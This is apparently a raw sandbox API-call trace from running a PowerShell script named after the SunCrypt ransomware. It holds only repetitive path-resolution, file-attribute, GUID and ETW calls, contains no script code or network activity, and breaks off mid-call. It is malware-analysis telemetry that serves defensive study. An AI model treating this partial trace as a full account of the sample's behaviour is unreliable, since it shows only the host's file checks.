lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 
[0097.602] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0097.602] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.602] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.611] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701042756971) returned 1 [0097.611] EtwEventActivityIdControl () returned 0x0 [0097.611] EtwEventActivityIdControl () returned 0x0 [0097.611] EtwEventActivityIdControl () returned 0x0 [0097.611] EtwEventActivityIdControl () returned 0x0 [0097.611] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xaa6b93eb, Data2=0x926e, Data3=0x4351, Data4=([0]=0x98, [1]=0x28, [2]=0x44, [3]=0xa4, [4]=0xbc, [5]=0x2b, [6]=0xcf, [7]=0xa3))) returned 0x0 [0097.612] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.612] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.612] CoTaskMemFree (pv=0x4272d90) [0097.613] 
QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701042911743) returned 1 [0097.613] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.613] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0097.613] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.613] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0097.613] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.613] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.616] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701043225987) returned 1 [0097.616] 
EtwEventActivityIdControl () returned 0x0 [0097.616] EtwEventActivityIdControl () returned 0x0 [0097.616] EtwEventActivityIdControl () returned 0x0 [0097.617] EtwEventActivityIdControl () returned 0x0 [0097.618] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x7dcec088, Data2=0xc496, Data3=0x4afe, Data4=([0]=0x88, [1]=0x4, [2]=0xb0, [3]=0x54, [4]=0x27, [5]=0x9a, [6]=0xd3, [7]=0xe))) returned 0x0 [0097.618] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.618] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.618] CoTaskMemFree (pv=0x4272d90) [0097.618] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701043505031) returned 1 [0097.619] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.619] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0097.619] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.619] SetThreadErrorMode 
(dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0097.619] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.619] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.620] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701043679758) returned 1 [0097.620] EtwEventActivityIdControl () returned 0x0 [0097.621] EtwEventActivityIdControl () returned 0x0 [0097.621] EtwEventActivityIdControl () returned 0x0 [0097.621] EtwEventActivityIdControl () returned 0x0 [0097.621] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xe2a48b1, Data2=0xe199, Data3=0x4aad, Data4=([0]=0x92, [1]=0xe2, [2]=0x17, [3]=0xe0, [4]=0x69, [5]=0xdf, [6]=0x8, [7]=0x36))) returned 0x0 [0097.621] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.621] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.621] CoTaskMemFree (pv=0x4272d90) [0097.622] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701043815444) returned 1 [0097.622] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.622] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.622] SetThreadErrorMode (dwNewMode=0x1, 
lpOldMode=0x4ebeb4c) returned 1 [0097.622] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.622] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0097.622] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.622] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.632] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701044857722) returned 1 [0097.632] EtwEventActivityIdControl () returned 0x0 [0097.632] EtwEventActivityIdControl () returned 0x0 [0097.632] EtwEventActivityIdControl () returned 0x0 [0097.709] EtwEventActivityIdControl () returned 0x0 [0097.709] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x1acbafa3, Data2=0xa81b, Data3=0x4633, Data4=([0]=0xae, [1]=0xb1, [2]=0xb4, [3]=0x7f, [4]=0x1a, [5]=0xd7, [6]=0x1b, [7]=0xc3))) returned 0x0 [0097.710] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.710] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.710] CoTaskMemFree 
(pv=0x4272d90) [0097.710] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701052656632) returned 1 [0097.710] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.710] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0097.710] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0097.710] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.711] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.718] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701053436006) 
returned 1 [0097.718] EtwEventActivityIdControl () returned 0x0 [0097.718] EtwEventActivityIdControl () returned 0x0 [0097.718] EtwEventActivityIdControl () returned 0x0 [0097.718] EtwEventActivityIdControl () returned 0x0 [0097.718] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x7a0842dd, Data2=0xfe9d, Data3=0x45c1, Data4=([0]=0x97, [1]=0xbd, [2]=0xd2, [3]=0xa4, [4]=0x2f, [5]=0x6, [6]=0xda, [7]=0xbc))) returned 0x0 [0097.719] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.719] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.719] CoTaskMemFree (pv=0x4272d90) [0097.719] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701053572555) returned 1 [0097.719] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.719] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0097.719] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.720] 
SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0097.720] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.720] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.721] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701053764552) returned 1 [0097.721] EtwEventActivityIdControl () returned 0x0 [0097.721] EtwEventActivityIdControl () returned 0x0 [0097.721] EtwEventActivityIdControl () returned 0x0 [0097.721] EtwEventActivityIdControl () returned 0x0 [0097.721] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x2d326cdc, Data2=0x5bcb, Data3=0x4a19, Data4=([0]=0x88, [1]=0x3f, [2]=0x51, [3]=0x14, [4]=0x0, [5]=0xeb, [6]=0xec, [7]=0xf6))) returned 0x0 [0097.722] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.722] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.722] CoTaskMemFree (pv=0x4272d90) [0097.722] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701053897642) returned 1 [0097.722] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.723] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.723] 
SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0097.723] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.723] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0097.723] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.723] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.724] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701054076653) returned 1 [0097.724] EtwEventActivityIdControl () returned 0x0 [0097.724] EtwEventActivityIdControl () returned 0x0 [0097.724] EtwEventActivityIdControl () returned 0x0 [0097.724] EtwEventActivityIdControl () returned 0x0 [0097.724] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x665adb6e, Data2=0x7bed, Data3=0x4ebe, Data4=([0]=0x88, [1]=0x7f, [2]=0x6c, [3]=0xcc, [4]=0x45, [5]=0xe0, [6]=0xbb, [7]=0xeb))) returned 0x0 [0097.725] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.725] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 
[0097.725] CoTaskMemFree (pv=0x4272d90) [0097.725] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701054200164) returned 1 [0097.725] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.726] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.726] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0097.726] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0097.726] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0097.726] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.726] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.727] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: 
lpPerformanceCount=0x4ebee28*=1701054365230) returned 1 [0097.727] EtwEventActivityIdControl () returned 0x0 [0097.727] EtwEventActivityIdControl () returned 0x0 [0097.727] EtwEventActivityIdControl () returned 0x0 [0097.727] EtwEventActivityIdControl () returned 0x0 [0097.727] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x56349a21, Data2=0x7cb9, Data3=0x444e, Data4=([0]=0xa9, [1]=0x65, [2]=0xe9, [3]=0xe2, [4]=0x54, [5]=0xba, [6]=0xb8, [7]=0x22))) returned 0x0 [0097.728] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.728] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.728] CoTaskMemFree (pv=0x4272d90) [0097.728] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701054484668) returned 1 [0097.728] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.728] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.728] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0097.729] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, 
nFileSizeLow=0x16366a)) returned 1 [0097.729] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0097.729] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0097.729] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0097.734] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701055058100) returned 1 [0097.734] EtwEventActivityIdControl () returned 0x0 [0097.734] EtwEventActivityIdControl () returned 0x0 [0097.734] EtwEventActivityIdControl () returned 0x0 [0097.808] EtwEventActivityIdControl () returned 0x0 [0097.931] CoCreateGuid (in: pguid=0x4ebf0c0 | out: pguid=0x4ebf0c0*(Data1=0xe96419b0, Data2=0xa122, Data3=0x4483, Data4=([0]=0xbe, [1]=0x53, [2]=0x4f, [3]=0xd8, [4]=0x2c, [5]=0x8e, [6]=0x11, [7]=0x91))) returned 0x0 [0097.931] CoTaskMemAlloc (cb=0x2cc) returned 0x4272d90 [0097.931] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4272d90, nSize=0x164 | out: lpBuffer="") returned 0x0 [0097.931] CoTaskMemFree (pv=0x4272d90) [0097.957] EtwEventActivityIdControl () returned 0x0 [0097.957] EtwEventActivityIdControl () returned 0x0 [0097.957] EtwEventActivityIdControl () returned 0x0 [0097.996] QueryPerformanceCounter (in: 